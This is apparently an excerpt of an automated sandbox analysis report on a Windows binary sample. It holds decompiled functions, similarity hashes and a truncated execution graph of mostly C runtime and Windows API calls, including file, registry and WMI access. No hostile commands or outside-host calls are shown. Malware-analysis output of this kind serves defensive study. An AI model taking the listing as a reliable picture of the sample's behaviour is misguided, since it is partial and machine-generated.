                                                                                                                              Strings
                                                                                                                              • invalid string position, xrefs: 00419F93
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                              • String ID: invalid string position
                                                                                                                              • API String ID: 1961742612-1799206989
                                                                                                                              • Opcode ID: 2dc00ef958b85bc7f2b27ed45cbbecfc2c2e53a15d1e4408e07416c877ae8ad8
                                                                                                                              • Instruction ID: 4dcefb9430163b7488ec39e53054acacc1018ca28a63302ac08549b0a37f4bbd
                                                                                                                              • Opcode Fuzzy Hash: 2dc00ef958b85bc7f2b27ed45cbbecfc2c2e53a15d1e4408e07416c877ae8ad8
                                                                                                                              • Instruction Fuzzy Hash: 0AE046B19101089ECB04EBC1CC42BCDB378AB18315F00A02BA201B6096DBB86A458628
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041D040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0041D040(signed int _a4) {
				intOrPtr _t11;
				void* _t12;
				void* _t13;

				if( *0x43c148 != 0) {
					_t4 =  &_a4; // 0x42223e
					return E0041CFF1(_t12, _t13,  *_t4, 0);
				} else {
					_t11 =  *0x43aeb0; // 0x433f68
					return  *(_t11 + _a4 * 2) & 4;
				}
			}






                                                                                                                              0x0041d047
                                                                                                                              0x0041d05d
                                                                                                                              0x0041d068
                                                                                                                              0x0041d049
                                                                                                                              0x0041d04d
                                                                                                                              0x0041d05a
                                                                                                                              0x0041d05a

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __isdigit_l
                                                                                                                              • String ID: >"B$h?C
                                                                                                                              • API String ID: 220229011-3556259458
                                                                                                                              • Opcode ID: d8857cb4533609fff14ed03952455beb2722dd4e63918fc7bebcf329e0c1633a
                                                                                                                              • Instruction ID: 16ce0760f5c50f79aaf4a7b5d888eb9e9f38f3354f4efddc4881d6248f964431
                                                                                                                              • Opcode Fuzzy Hash: d8857cb4533609fff14ed03952455beb2722dd4e63918fc7bebcf329e0c1633a
                                                                                                                              • Instruction Fuzzy Hash: 09D0A73204C2009EE6144704DC8171537A1A781306F20406DF041551F1CB7AA8A2EA08
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00974F9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CommandLine
                                                                                                                              • String ID: 03Z
                                                                                                                              • API String ID: 3253501508-2768232792
                                                                                                                              • Opcode ID: bb39ce47cfdc1bbc4ab518d6ce4c2c40929bc8f4fdc36dd4ee5b660f8d4432a2
                                                                                                                              • Instruction ID: f15da49cf36545f1fa46a48bbda02d3716b0a841d9261d7d38169aca6603fc63
                                                                                                                              • Opcode Fuzzy Hash: bb39ce47cfdc1bbc4ab518d6ce4c2c40929bc8f4fdc36dd4ee5b660f8d4432a2
                                                                                                                              • Instruction Fuzzy Hash: 25B092F8838600CFC7009F30F80C10A3FE0B2082133C10565D815C2721E7750018FF24
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:6.4%
                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                              Signature Coverage:0.2%
                                                                                                                              Total number of Nodes:1738
                                                                                                                              Total number of Limit Nodes:118
                                                                                                                              execution_graph 28930 11112f50 28932 11112f61 28930->28932 28931 11112f9e 28945 1100abc0 263 API calls _free 28931->28945 28932->28931 28949 1105e820 28932->28949 28935 11112fa9 28937 11112fb6 28935->28937 28938 11112fca 28935->28938 28936 11112f84 28936->28931 28959 1105e950 5 API calls 2 library calls 28936->28959 28946 11147af0 28937->28946 28960 11142e60 28938->28960 28941 11112fc8 28969 1100ac10 268 API calls 2 library calls 28941->28969 28944 11112fe6 std::ios_base::_Tidy 28945->28935 28970 111479b0 28946->28970 28950 1105e84f 28949->28950 28951 1105e875 28950->28951 28952 1105e855 28950->28952 28953 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 28951->28953 28999 1116450b 28952->28999 28955 1105e882 28953->28955 28955->28936 28957 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 28958 1105e86f 28957->28958 28958->28936 28959->28931 28961 11142e6a 28960->28961 28963 11142e6c 28960->28963 28961->28941 29166 11110230 28963->29166 28964 11142e92 28965 11142e9b _strncpy 28964->28965 28966 11142eb9 28964->28966 28965->28941 29173 11029a70 262 API calls 2 library calls 28966->29173 28969->28944 28985 110963b0 28970->28985 28973 11147a02 28976 11147a1e 28973->28976 28977 11147a09 wsprintfA 28973->28977 28974 111479f0 28987 111452d0 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 28974->28987 28978 11147a3a 28976->28978 28979 11147a26 28976->28979 28977->28978 28989 11147850 264 API calls 2 library calls 28978->28989 28988 11029a70 262 API calls 2 library calls 28979->28988 28982 11147a4a 28990 11162bb7 28982->28990 28984 11147a5a 28984->28941 28986 110963b9 LoadStringA 28985->28986 28986->28973 28986->28974 28987->28973 28989->28982 28991 11162bc1 IsDebuggerPresent 28990->28991 28992 11162bbf 28990->28992 28998 111784f7 28991->28998 28992->28984 28995 1116cb59 SetUnhandledExceptionFilter UnhandledExceptionFilter 28996 1116cb76 __call_reportfault 28995->28996 28997 1116cb7e GetCurrentProcess TerminateProcess 28995->28997 28996->28997 28997->28984 28998->28995 29000 11164524 28999->29000 29003 111642e0 29000->29003 29015 11164259 29003->29015 29005 11164304 29023 1116a1af 66 API calls __getptd_noexit 29005->29023 29008 11164309 29024 1116edc4 11 API calls _fseek 29008->29024 29010 1116433a 29013 11164381 29010->29013 29025 11171a63 79 API calls 3 library calls 29010->29025 29012 1105e862 29012->28957 29013->29012 29026 1116a1af 66 API calls __getptd_noexit 29013->29026 29016 1116426c 29015->29016 29022 111642b9 29015->29022 29027 1116c675 29016->29027 29019 11164299 29019->29022 29047 111715a2 68 API calls 6 library calls 29019->29047 29022->29005 29022->29010 29023->29008 29024->29012 29025->29010 29026->29012 29048 1116c5fc GetLastError 29027->29048 29029 1116c67d 29030 11164271 29029->29030 29062 1116e66a 66 API calls 3 library calls 29029->29062 29030->29019 29032 11171306 29030->29032 29033 11171312 _fseek 29032->29033 29034 1116c675 __getptd 66 API calls 29033->29034 29035 11171317 29034->29035 29036 11171345 29035->29036 29038 11171329 29035->29038 29092 1117459f 29036->29092 29040 1116c675 __getptd 66 API calls 29038->29040 29039 1117134c 29099 111712b9 74 API calls 3 library calls 29039->29099 29042 1117132e 29040->29042 29045 1117133c _fseek 29042->29045 29091 1116e66a 66 API calls 3 library calls 29042->29091 29043 11171360 29100 11171373 LeaveCriticalSection _doexit 29043->29100 29045->29019 29047->29022 29063 1116c4ba TlsGetValue 29048->29063 29051 1116c669 SetLastError 29051->29029 29054 1116c62f DecodePointer 29055 1116c644 29054->29055 29056 1116c660 29055->29056 29057 1116c648 29055->29057 29073 11163aa5 29056->29073 29072 1116c548 66 API calls 4 library calls 29057->29072 29060 1116c650 GetCurrentThreadId 29060->29051 29061 1116c666 29061->29051 29064 1116c4cf RtlDecodePointer TlsSetValue 29063->29064 29065 1116c4ea 29063->29065 29064->29065 29065->29051 29066 1116ac7e 29065->29066 29069 1116ac87 29066->29069 29068 1116acc4 29068->29051 29068->29054 29069->29068 29070 1116aca5 Sleep 29069->29070 29079 11170fc4 29069->29079 29071 1116acba 29070->29071 29071->29068 29071->29069 29072->29060 29074 11163ab0 HeapFree 29073->29074 29075 11163ad9 __dosmaperr 29073->29075 29074->29075 29076 11163ac5 29074->29076 29075->29061 29090 1116a1af 66 API calls __getptd_noexit 29076->29090 29078 11163acb GetLastError 29078->29075 29080 11170fd0 29079->29080 29083 11170feb 29079->29083 29081 11170fdc 29080->29081 29080->29083 29088 1116a1af 66 API calls __getptd_noexit 29081->29088 29084 11170ffe RtlAllocateHeap 29083->29084 29086 11171025 29083->29086 29089 1116e368 DecodePointer 29083->29089 29084->29083 29084->29086 29085 11170fe1 29085->29069 29086->29069 29088->29085 29089->29083 29090->29078 29093 111745c7 EnterCriticalSection 29092->29093 29094 111745b4 29092->29094 29093->29039 29101 111744dd 29094->29101 29096 111745ba 29096->29093 29128 1116e66a 66 API calls 3 library calls 29096->29128 29099->29043 29100->29042 29102 111744e9 _fseek 29101->29102 29103 11174511 29102->29103 29104 111744f9 29102->29104 29116 1117451f _fseek 29103->29116 29132 1116ac39 29103->29132 29129 1116e85d 66 API calls __NMSG_WRITE 29104->29129 29107 111744fe 29130 1116e6ae 66 API calls 6 library calls 29107->29130 29110 11174531 29138 1116a1af 66 API calls __getptd_noexit 29110->29138 29111 11174540 29114 1117459f __lock 65 API calls 29111->29114 29112 11174505 29131 1116e3ed GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 29112->29131 29117 11174547 29114->29117 29116->29096 29119 1117454f InitializeCriticalSectionAndSpinCount 29117->29119 29120 1117457a 29117->29120 29122 1117456b 29119->29122 29123 1117455f 29119->29123 29121 11163aa5 _free 65 API calls 29120->29121 29121->29122 29140 11174596 LeaveCriticalSection _doexit 29122->29140 29124 11163aa5 _free 65 API calls 29123->29124 29126 11174565 29124->29126 29139 1116a1af 66 API calls __getptd_noexit 29126->29139 29129->29107 29130->29112 29134 1116ac42 29132->29134 29135 1116ac78 29134->29135 29136 1116ac59 Sleep 29134->29136 29141 11163a11 29134->29141 29135->29110 29135->29111 29137 1116ac6e 29136->29137 29137->29134 29137->29135 29138->29116 29139->29122 29140->29116 29142 11163a8e 29141->29142 29149 11163a1f 29141->29149 29164 1116e368 DecodePointer 29142->29164 29144 11163a94 29165 1116a1af 66 API calls __getptd_noexit 29144->29165 29147 11163a4d RtlAllocateHeap 29147->29149 29157 11163a86 29147->29157 29149->29147 29150 11163a7a 29149->29150 29154 11163a78 29149->29154 29155 11163a2a 29149->29155 29161 1116e368 DecodePointer 29149->29161 29162 1116a1af 66 API calls __getptd_noexit 29150->29162 29163 1116a1af 66 API calls __getptd_noexit 29154->29163 29155->29149 29158 1116e85d 66 API calls __NMSG_WRITE 29155->29158 29159 1116e6ae 66 API calls 6 library calls 29155->29159 29160 1116e3ed GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 29155->29160 29157->29134 29158->29155 29159->29155 29161->29149 29162->29154 29163->29157 29164->29144 29165->29157 29167 11163a11 _malloc 66 API calls 29166->29167 29168 1111023e 29167->29168 29169 11110247 29168->29169 29170 1111025e _memset 29168->29170 29174 11029a70 262 API calls 2 library calls 29169->29174 29170->28964 29175 11015580 CreateFileA 29176 110155a2 CloseHandle 29175->29176 29177 110155ae 29175->29177 29176->29177 29178 110155c0 29185 110155f6 _memset 29178->29185 29179 11015670 wsprintfA 29179->29185 29180 1101575d 29182 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 29180->29182 29181 110ed520 8 API calls 29181->29185 29183 11015777 29182->29183 29184 110156c3 RegQueryValueExA 29184->29185 29185->29179 29185->29180 29185->29181 29185->29184 29187 11129e00 85 API calls 29185->29187 29187->29185 29188 110179e0 GetTickCount 29195 110178f0 29188->29195 29196 11017910 29195->29196 29202 110179c6 29195->29202 29197 11017932 CoInitialize _GetRawWMIStringW 29196->29197 29199 11017929 WaitForSingleObject 29196->29199 29203 110179b2 29197->29203 29207 11017965 29197->29207 29198 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 29200 110179d5 29198->29200 29199->29197 29208 11017810 29200->29208 29201 110179c0 CoUninitialize 29201->29202 29202->29198 29203->29201 29203->29202 29204 110179ac 29232 111646f7 67 API calls __fassign 29204->29232 29207->29203 29207->29204 29227 111648ed 29207->29227 29209 11017830 29208->29209 29210 110178d6 29208->29210 29211 11017848 CoInitialize _GetRawWMIStringW 29209->29211 29213 1101783f WaitForSingleObject 29209->29213 29212 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 29210->29212 29217 1101787b 29211->29217 29219 110178c2 29211->29219 29214 110178e5 SetEvent GetTickCount 29212->29214 29213->29211 29221 11147060 29214->29221 29215 110178d0 CoUninitialize 29215->29210 29216 110178bc 29234 111646f7 67 API calls __fassign 29216->29234 29217->29216 29217->29219 29220 111648ed std::locale::_Init 79 API calls 29217->29220 29219->29210 29219->29215 29220->29217 29222 11147071 29221->29222 29223 1114706c 29221->29223 29236 111464c0 29222->29236 29235 11146270 18 API calls std::locale::_Init 29223->29235 29228 1116490d 29227->29228 29229 111648fb 29227->29229 29233 1116489c 79 API calls 2 library calls 29228->29233 29229->29207 29231 11164917 29231->29207 29232->29203 29233->29231 29234->29219 29235->29222 29239 11146370 29236->29239 29238 11017a27 29240 11146394 29239->29240 29241 11146399 29239->29241 29259 11146270 18 API calls std::locale::_Init 29240->29259 29243 11146402 29241->29243 29244 111463a2 29241->29244 29245 111464ae 29243->29245 29246 1114640f wsprintfA 29243->29246 29247 111463d9 29244->29247 29252 111463b0 29244->29252 29248 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 29245->29248 29249 11146432 29246->29249 29253 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 29247->29253 29250 111464ba 29248->29250 29249->29249 29251 11146439 wvsprintfA 29249->29251 29250->29238 29258 11146454 29251->29258 29255 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 29252->29255 29254 111463fe 29253->29254 29254->29238 29256 111463d5 29255->29256 29256->29238 29257 111464a1 OutputDebugStringA 29257->29245 29258->29257 29258->29258 29259->29241 29260 110230a0 29261 110230ba 29260->29261 29262 110231ad 29260->29262 29263 110230c0 29261->29263 29264 11023197 29261->29264 29265 11023207 29262->29265 29266 110231b5 29262->29266 29269 11023183 29263->29269 29270 110230da 29263->29270 29280 11023131 29263->29280 29284 110230fa 29263->29284 29297 1101ee60 287 API calls 29264->29297 29265->29280 29299 11023070 418 API calls _free 29265->29299 29268 110231fc 29266->29268 29276 110231b7 29266->29276 29298 1101eb20 305 API calls 2 library calls 29268->29298 29296 1101ee30 289 API calls 29269->29296 29278 110230eb SetFocus 29270->29278 29270->29280 29272 110231a4 29275 110231d5 29276->29275 29276->29280 29286 11089cf0 29276->29286 29278->29280 29279 11023205 29279->29280 29283 1102314b 29280->29283 29300 110cbd30 7 API calls 29280->29300 29281 11023232 29284->29280 29295 1101ffb0 328 API calls 2 library calls 29284->29295 29301 111103d0 29286->29301 29288 11089d03 29289 11089d0d 29288->29289 29310 11089430 265 API calls std::locale::_Init 29288->29310 29292 11089d34 29289->29292 29311 11089430 265 API calls std::locale::_Init 29289->29311 29294 11089d43 29292->29294 29307 11089cc0 29292->29307 29294->29280 29295->29280 29296->29280 29297->29272 29298->29279 29299->29280 29300->29281 29302 111103e7 EnterCriticalSection 29301->29302 29303 111103de GetCurrentThreadId 29301->29303 29304 111103fe ___DllMainCRTStartup 29302->29304 29303->29302 29305 11110405 LeaveCriticalSection 29304->29305 29306 11110418 LeaveCriticalSection 29304->29306 29305->29288 29306->29288 29312 11089950 29307->29312 29310->29289 29311->29292 29353 11088c40 6 API calls ___DllMainCRTStartup 29312->29353 29314 11089989 GetParent 29315 1108999c 29314->29315 29316 110899ad 29314->29316 29317 110899a0 GetParent 29315->29317 29368 11145990 264 API calls 2 library calls 29316->29368 29317->29316 29317->29317 29319 110899b9 29354 11164ead 29319->29354 29321 110899c6 std::ios_base::_Tidy 29369 11145990 264 API calls 2 library calls 29321->29369 29323 110899df 29370 11013dd0 22 API calls 2 library calls 29323->29370 29325 110899fa 29325->29325 29357 11143e00 29325->29357 29327 11089a55 29331 11089a73 std::locale::_Init 29327->29331 29371 11164c77 29327->29371 29328 11089a3a std::ios_base::_Tidy 29328->29327 29330 11142e60 std::locale::_Init 262 API calls 29328->29330 29330->29327 29342 11089b24 std::ios_base::_Tidy 29331->29342 29384 1102ad70 29331->29384 29332 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 29334 11089c12 29332->29334 29334->29294 29336 11142e60 std::locale::_Init 262 API calls 29337 11089acb 29336->29337 29387 11081e00 29337->29387 29339 11089ae2 29339->29342 29391 11081e70 86 API calls 2 library calls 29339->29391 29341 11089afa 29343 11089b3e 29341->29343 29344 11089b01 29341->29344 29342->29332 29395 11081e70 86 API calls 2 library calls 29343->29395 29392 110b7aa0 29344->29392 29347 11089b49 29347->29342 29350 110b7aa0 68 API calls 29347->29350 29349 110b7aa0 68 API calls 29349->29342 29351 11089b56 29350->29351 29351->29342 29352 110b7aa0 68 API calls 29351->29352 29352->29342 29353->29314 29396 11164df1 29354->29396 29356 11164ebf 29356->29321 29358 11143e21 CreateFileA 29357->29358 29360 11143ebe FindCloseChangeNotification 29358->29360 29361 11143e9e 29358->29361 29362 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 29360->29362 29363 11143ea2 CreateFileA 29361->29363 29364 11143edb 29361->29364 29365 11143ed7 29362->29365 29363->29360 29363->29364 29366 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 29364->29366 29365->29328 29367 11143eea 29366->29367 29367->29328 29368->29319 29369->29323 29370->29325 29372 11164c83 _fseek 29371->29372 29373 11164c95 29372->29373 29374 11164caa 29372->29374 29741 1116a1af 66 API calls __getptd_noexit 29373->29741 29380 11164ca5 _fseek 29374->29380 29743 1116be59 29374->29743 29377 11164c9a 29742 1116edc4 11 API calls _fseek 29377->29742 29380->29331 29829 11028c10 29384->29829 29386 1102ad7e 29386->29336 29388 11081e13 _strrchr 29387->29388 29390 11081e2a std::locale::_Init 29388->29390 29957 11081c50 IsDBCSLeadByte 29388->29957 29390->29339 29391->29341 29958 110b7a80 29392->29958 29395->29347 29398 11164dfd _fseek 29396->29398 29397 11164e10 29454 1116a1af 66 API calls __getptd_noexit 29397->29454 29398->29397 29400 11164e3d 29398->29400 29415 11172558 29400->29415 29401 11164e15 29455 1116edc4 11 API calls _fseek 29401->29455 29404 11164e42 29405 11164e56 29404->29405 29406 11164e49 29404->29406 29408 11164e7d 29405->29408 29409 11164e5d 29405->29409 29456 1116a1af 66 API calls __getptd_noexit 29406->29456 29432 111722c1 29408->29432 29457 1116a1af 66 API calls __getptd_noexit 29409->29457 29410 11164e20 _fseek @_EH4_CallFilterFunc@8 29410->29356 29416 11172564 _fseek 29415->29416 29417 1117459f __lock 66 API calls 29416->29417 29430 11172572 29417->29430 29418 111725e7 29459 11172682 29418->29459 29419 111725ee 29421 1116ac39 __malloc_crt 66 API calls 29419->29421 29423 111725f5 29421->29423 29422 11172677 _fseek 29422->29404 29423->29418 29424 11172603 InitializeCriticalSectionAndSpinCount 29423->29424 29425 11172636 EnterCriticalSection 29424->29425 29426 11172623 29424->29426 29425->29418 29429 11163aa5 _free 66 API calls 29426->29429 29427 111744dd __mtinitlocknum 66 API calls 29427->29430 29429->29418 29430->29418 29430->29419 29430->29427 29462 1116be9a 67 API calls __lock 29430->29462 29463 1116bf08 LeaveCriticalSection LeaveCriticalSection _doexit 29430->29463 29433 111722e3 29432->29433 29434 111722f7 29433->29434 29445 1117230e 29433->29445 29468 1116a1af 66 API calls __getptd_noexit 29434->29468 29436 111724ab 29439 11172511 29436->29439 29440 111724ff 29436->29440 29437 111722fc 29469 1116edc4 11 API calls _fseek 29437->29469 29465 1117a5c3 29439->29465 29474 1116a1af 66 API calls __getptd_noexit 29440->29474 29443 11164e88 29458 11164ea3 LeaveCriticalSection LeaveCriticalSection __fsopen 29443->29458 29444 11172504 29475 1116edc4 11 API calls _fseek 29444->29475 29445->29436 29445->29440 29470 1117a94d 76 API calls __fassign 29445->29470 29448 1117247a 29448->29440 29471 1117a7e7 85 API calls __mbsnbicmp_l 29448->29471 29450 111724a4 29450->29436 29472 1117a7e7 85 API calls __mbsnbicmp_l 29450->29472 29452 111724c3 29452->29436 29473 1117a7e7 85 API calls __mbsnbicmp_l 29452->29473 29454->29401 29455->29410 29456->29410 29457->29410 29458->29410 29464 111744c6 LeaveCriticalSection 29459->29464 29461 11172689 29461->29422 29462->29430 29463->29430 29464->29461 29476 1117a4ff 29465->29476 29467 1117a5de 29467->29443 29468->29437 29469->29443 29470->29448 29471->29450 29472->29452 29473->29436 29474->29444 29475->29443 29479 1117a50b _fseek 29476->29479 29477 1117a51e 29596 1116a1af 66 API calls __getptd_noexit 29477->29596 29479->29477 29481 1117a554 29479->29481 29480 1117a523 29597 1116edc4 11 API calls _fseek 29480->29597 29487 11179dcb 29481->29487 29484 1117a56e 29598 1117a595 LeaveCriticalSection __unlock_fhandle 29484->29598 29486 1117a52d _fseek 29486->29467 29488 11179df2 29487->29488 29599 1117d375 29488->29599 29491 11179e4d 29627 1116a1c2 66 API calls __getptd_noexit 29491->29627 29492 1117a4fe _fseek 29494 1117a51e 29492->29494 29502 1117a554 29492->29502 29738 1116a1af 66 API calls __getptd_noexit 29494->29738 29495 11179e0e 29495->29491 29497 11179ea8 29495->29497 29541 1117a07d 29495->29541 29496 11179e52 29628 1116a1af 66 API calls __getptd_noexit 29496->29628 29506 11179f2f 29497->29506 29513 11179f02 29497->29513 29500 11179e5c 29629 1116edc4 11 API calls _fseek 29500->29629 29501 1117a523 29739 1116edc4 11 API calls _fseek 29501->29739 29505 11179dcb __tsopen_nolock 117 API calls 29502->29505 29507 1117a56e 29505->29507 29630 1116a1c2 66 API calls __getptd_noexit 29506->29630 29740 1117a595 LeaveCriticalSection __unlock_fhandle 29507->29740 29510 11179f34 29631 1116a1af 66 API calls __getptd_noexit 29510->29631 29511 11179e66 29511->29484 29606 1117798a 29513->29606 29514 11179f3e 29632 1116edc4 11 API calls _fseek 29514->29632 29515 1117a52d _fseek 29515->29484 29518 11179fc0 29519 11179fea CreateFileA 29518->29519 29520 11179fc9 29518->29520 29522 1117a087 GetFileType 29519->29522 29523 1117a017 29519->29523 29633 1116a1c2 66 API calls __getptd_noexit 29520->29633 29526 1117a094 GetLastError 29522->29526 29527 1117a0d8 29522->29527 29524 1117a050 GetLastError 29523->29524 29528 1117a02b CreateFileA 29523->29528 29636 1116a1d5 66 API calls 3 library calls 29524->29636 29525 11179fce 29634 1116a1af 66 API calls __getptd_noexit 29525->29634 29638 1116a1d5 66 API calls 3 library calls 29526->29638 29640 11177754 67 API calls 2 library calls 29527->29640 29528->29522 29528->29524 29532 1117a077 29637 1116a1af 66 API calls __getptd_noexit 29532->29637 29533 11179fd8 29635 1116a1af 66 API calls __getptd_noexit 29533->29635 29534 1117a0bd CloseHandle 29534->29532 29537 1117a0cb 29534->29537 29639 1116a1af 66 API calls __getptd_noexit 29537->29639 29538 1117a0f6 29543 1117a30c 29538->29543 29544 1117a14c 29538->29544 29546 1117a1bb 29538->29546 29624 1116ed72 29541->29624 29542 1117a0d0 29542->29532 29543->29541 29547 1117a474 CloseHandle CreateFileA 29543->29547 29641 11175746 68 API calls 3 library calls 29544->29641 29546->29543 29559 1117a315 29546->29559 29567 1117a265 29546->29567 29549 1117a4cf 29547->29549 29550 1117a4a1 GetLastError 29547->29550 29548 1117a156 29551 1117a15f 29548->29551 29552 1117a178 29548->29552 29549->29541 29736 1116a1d5 66 API calls 3 library calls 29550->29736 29642 1116a1c2 66 API calls __getptd_noexit 29551->29642 29658 11175099 29552->29658 29557 1117a4ad 29737 111777d5 67 API calls 2 library calls 29557->29737 29558 1117a164 29558->29546 29562 1117a16c 29558->29562 29559->29543 29569 1117a332 29559->29569 29573 1117a289 29559->29573 29560 1117a1a2 29560->29562 29727 11175746 68 API calls 3 library calls 29560->29727 29643 11171dc8 29562->29643 29563 1117a2dd 29565 11175099 __read_nolock 75 API calls 29563->29565 29577 1117a2ea 29565->29577 29567->29543 29567->29563 29571 1117a2b4 29567->29571 29567->29573 29730 11176489 68 API calls 3 library calls 29569->29730 29728 11176489 68 API calls 3 library calls 29571->29728 29572 1117a33d 29572->29573 29580 1117a348 29572->29580 29573->29543 29573->29562 29735 111730a4 95 API calls 5 library calls 29573->29735 29574 1117a373 29581 11171dc8 __close_nolock 69 API calls 29574->29581 29575 1117a38d 29578 1117a3af 29575->29578 29582 1117a394 29575->29582 29577->29543 29577->29562 29577->29574 29577->29575 29577->29578 29734 11175746 68 API calls 3 library calls 29578->29734 29731 11176489 68 API calls 3 library calls 29580->29731 29586 1117a37a 29581->29586 29733 11175746 68 API calls 3 library calls 29582->29733 29583 1117a2bf 29583->29573 29588 1117a2c6 29583->29588 29732 1116a1af 66 API calls __getptd_noexit 29586->29732 29729 11176489 68 API calls 3 library calls 29588->29729 29589 1117a352 29589->29543 29589->29562 29591 1117a39e 29591->29562 29594 1117a3a9 29591->29594 29594->29543 29595 1117a2d0 29595->29562 29595->29563 29596->29480 29597->29486 29598->29486 29600 1117d396 29599->29600 29601 1117d381 29599->29601 29600->29495 29602 1116a1af _fseek 66 API calls 29601->29602 29603 1117d386 29602->29603 29604 1116edc4 _fseek 11 API calls 29603->29604 29605 1117d391 29604->29605 29605->29495 29607 11177996 _fseek 29606->29607 29608 111744dd __mtinitlocknum 66 API calls 29607->29608 29609 111779a6 29608->29609 29610 1117459f __lock 66 API calls 29609->29610 29611 111779ab _fseek 29609->29611 29618 111779ba 29610->29618 29611->29518 29612 11177b1a __alloc_osfhnd LeaveCriticalSection 29612->29611 29613 11177a92 29614 1116ac7e __calloc_crt 66 API calls 29613->29614 29619 11177a9b 29614->29619 29615 11177a3a EnterCriticalSection 29617 11177a4a LeaveCriticalSection 29615->29617 29615->29618 29616 1117459f __lock 66 API calls 29616->29618 29617->29618 29618->29613 29618->29615 29618->29616 29620 11177a10 InitializeCriticalSectionAndSpinCount 29618->29620 29622 11177a5c __alloc_osfhnd LeaveCriticalSection 29618->29622 29623 11177afc 29618->29623 29621 111778c4 ___lock_fhandle 68 API calls 29619->29621 29619->29623 29620->29618 29621->29623 29622->29618 29623->29612 29625 1116ec49 __call_reportfault 8 API calls 29624->29625 29626 1116ed84 GetCurrentProcess TerminateProcess 29625->29626 29626->29492 29627->29496 29628->29500 29629->29511 29630->29510 29631->29514 29632->29511 29633->29525 29634->29533 29635->29511 29636->29532 29637->29541 29638->29534 29639->29542 29640->29538 29641->29548 29642->29558 29644 1117785b __close_nolock 66 API calls 29643->29644 29646 11171dd8 29644->29646 29645 11171e2e 29648 111777d5 __free_osfhnd 67 API calls 29645->29648 29646->29645 29647 11171e0c 29646->29647 29649 1117785b __close_nolock 66 API calls 29646->29649 29647->29645 29650 1117785b __close_nolock 66 API calls 29647->29650 29651 11171e36 29648->29651 29653 11171e03 29649->29653 29654 11171e18 FindCloseChangeNotification 29650->29654 29652 11171e58 29651->29652 29655 1116a1d5 __dosmaperr 66 API calls 29651->29655 29652->29532 29656 1117785b __close_nolock 66 API calls 29653->29656 29654->29645 29657 11171e24 GetLastError 29654->29657 29655->29652 29656->29647 29657->29645 29659 111750b5 29658->29659 29660 111750d0 29658->29660 29662 1116a1c2 __read 66 API calls 29659->29662 29661 111750df 29660->29661 29663 111750fe 29660->29663 29664 1116a1c2 __read 66 API calls 29661->29664 29665 111750ba 29662->29665 29668 1117511c 29663->29668 29679 11175130 29663->29679 29667 111750e4 29664->29667 29666 1116a1af _fseek 66 API calls 29665->29666 29680 111750c2 29666->29680 29670 1116a1af _fseek 66 API calls 29667->29670 29671 1116a1c2 __read 66 API calls 29668->29671 29669 11175186 29673 1116a1c2 __read 66 API calls 29669->29673 29672 111750eb 29670->29672 29674 